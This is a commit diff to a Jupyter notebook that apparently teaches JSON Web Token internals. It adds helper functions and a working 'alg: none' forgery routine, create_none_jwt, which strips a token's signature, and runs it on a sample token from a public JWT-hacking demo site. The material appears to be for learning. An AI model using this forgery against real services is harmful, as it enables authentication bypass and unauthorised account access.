Added comments to the code and tested it

--- a/jwt/Json Web Tokens.ipynb
+++ b/jwt/Json Web Tokens.ipynb
@@ -16,6 +16,10 @@
     "- JSON\n",
     "- BASE64\n",
     "- Signing\n",
+    "\n",
+    "## Some usefull sites\n",
+    "- Check your JWT: https://jwt.io/\n",
+    "- Demo JWT hacking: http://demo.sjoerdlangkemper.nl/jwtdemo/hs256.php\n",
     "\n"
    ]
   },
@@ -31,14 +35,19 @@
   },
   {
    "cell_type": "code",
-   "execution_count": 153,
+   "execution_count": 159,
    "metadata": {},
    "outputs": [],
    "source": [
+    "# This method converts a Python dict to a base64 string. While b64encode adds\n",
+    "# padding characters '=' to get multiples of four. The JWT wants these removed.\n",
     "def dict_to_base64(d):\n",
     "    j = json.dumps(d, separators=(',', ':'));\n",
-    "    return base64.b64encode(bytes(j, 'utf-8')).decode('utf-8');\n",
+    "    return base64.b64encode(bytes(j, 'utf-8')).decode('utf-8').rstrip('=');\n",
     "\n",
+    "# This method converts a base64 string to a Python dict. The b64decode wants\n",
+    "# to have a multiple of four characters for the string, so padding characters\n",
+    "# = are added to the end of the string.\n",
     "def base64_to_dict(b):\n",
     "    padding = 4 - (len(b) % 4);\n",
     "    return json.loads(base64.b64decode(b + (\"=\" * padding)));"
@@ -46,71 +55,70 @@
   },
   {
    "cell_type": "code",
-   "execution_count": 149,
+   "execution_count": 161,
    "metadata": {},
    "outputs": [],
    "source": [
+    "# This method creates a JWT token, based on the header and payload. At this\n",
+    "# moment, not signature method has been implemented. The signature will become\n",
+    "# an empty string. However, using this method it is still possible to crack\n",
+    "# JWT token libraries that accept the 'none' algorithm.\n",
     "def create_jwt(header, payload):\n",
     "    return dict_to_base64(header) + \".\" + dict_to_base64(payload) + \".\";\n",
     "\n",
+    "# This method decodes the JWT. Also the signature is not taken into account. It\n",
+    "# returns a Python dict that contains the header, payload and the signature.\n",
     "def decode_jwt(jwt):\n",
     "    (header, payload, signature) = jwt.split(\".\");\n",
     "    return {\n",
     "        \"header\": base64_to_dict(header),\n",
     "        \"payload\": base64_to_dict(payload),\n",
-    "        \"signature\": \"\"\n",
+    "        \"signature\": signature\n",
     "    };"
    ]
   },
   {
    "cell_type": "code",
-   "execution_count": 158,
+   "execution_count": 163,
    "metadata": {},
    "outputs": [
     {
      "name": "stdout",
      "output_type": "stream",
      "text": [
-      "{'header': {'typ': 'JWT', 'alg': 'none'}, 'payload': {'iss': 'http://demo.sjoerdlangkemper.nl/', 'iat': 1608338331, 'exp': 1608338451, 'data': {'hello': 'world'}}, 'signature': ''}\n",
-      "eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0=.eyJpc3MiOiJodHRwOi8vZGVtby5zam9lcmRsYW5na2VtcGVyLm5sLyIsImlhdCI6MTYwODMzODMzMSwiZXhwIjoxNjA4MzM4NDUxLCJkYXRhIjp7ImhlbGxvIjoid29ybGQifX0=.\n"
+      "eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJpc3MiOiJodHRwOi8vZGVtby5zam9lcmRsYW5na2VtcGVyLm5sLyIsImlhdCI6MTYwODMzODMzMSwiZXhwIjoxNjA4MzM4NDUxLCJkYXRhIjp7ImhlbGxvIjoid29ybGQifX0.\n"
      ]
     }
    ],
    "source": [
-    "jwt = \"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwOlwvXC9kZW1vLnNqb2VyZGxhbmdrZW1wZXIubmxcLyIsImlhdCI6MTYwODMzODMzMSwiZXhwIjoxNjA4MzM4NDUxLCJkYXRhIjp7ImhlbGxvIjoid29ybGQifX0.c2QtOCmjjTZiOwfmswN_kBFPENwmb47PUHZwgk1UD9A\";\n",
-    "data = decode_jwt(jwt);\n",
-    "data['header']['alg'] = \"none\";\n",
-    "jwt_hacked = create_jwt(data['header'], data['payload']);\n",
-    "print(data);\n",
-    "print(jwt_hacked);\n",
-    "\n"
+    "# This method creates a new JWT token, based on the token jwt given to the\n",
+    "# method. It changes the algorith to non and returns the new token. When the\n",
+    "# library is vulnerable, this token can be user to log into the system at any\n",
+    "# time.\n",
+    "def create_none_jwt(jwt):\n",
+    "    data = decode_jwt(jwt);\n",
+    "    data['header']['alg'] = \"none\";\n",
+    "    return create_jwt(data['header'], data['payload']);"
    ]
   },
   {
    "cell_type": "code",
-   "execution_count": 75,
+   "execution_count": 164,
    "metadata": {},
    "outputs": [
     {
      "name": "stdout",
      "output_type": "stream",
      "text": [
-      "b'{\"typ\":\"JWT\",\"alg\":\"HS256\"}'\n"
+      "eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJpc3MiOiJodHRwOi8vZGVtby5zam9lcmRsYW5na2VtcGVyLm5sLyIsImlhdCI6MTYwODMzOTM3NSwiZXhwIjoxNjA4MzM5NDk1LCJkYXRhIjp7ImhlbGxvIjoid29ybGQifX0.\n"
      ]
     }
    ],
    "source": [
-    "h64 = \"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9\"\n",
-    "\n",
-    "print(base64.b64decode(h64));"
+    "# Hack a JWT token!\n",
+    "jwt = create_none_jwt(\" eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwOlwvXC9kZW1vLnNqb2VyZGxhbmdrZW1wZXIubmxcLyIsImlhdCI6MTYwODMzOTM3NSwiZXhwIjoxNjA4MzM5NDk1LCJkYXRhIjp7ImhlbGxvIjoid29ybGQifX0.OWpFkKa8HOIXYQ9HRfyB4Uimg1-e-AXErkw_0TBuvsM\");\n",
+    "print(jwt);"
    ]
-  },
-  {
-   "cell_type": "code",
-   "execution_count": null,
-   "metadata": {},
-   "outputs": [],
-   "source": []
   }
  ],
  "metadata": {
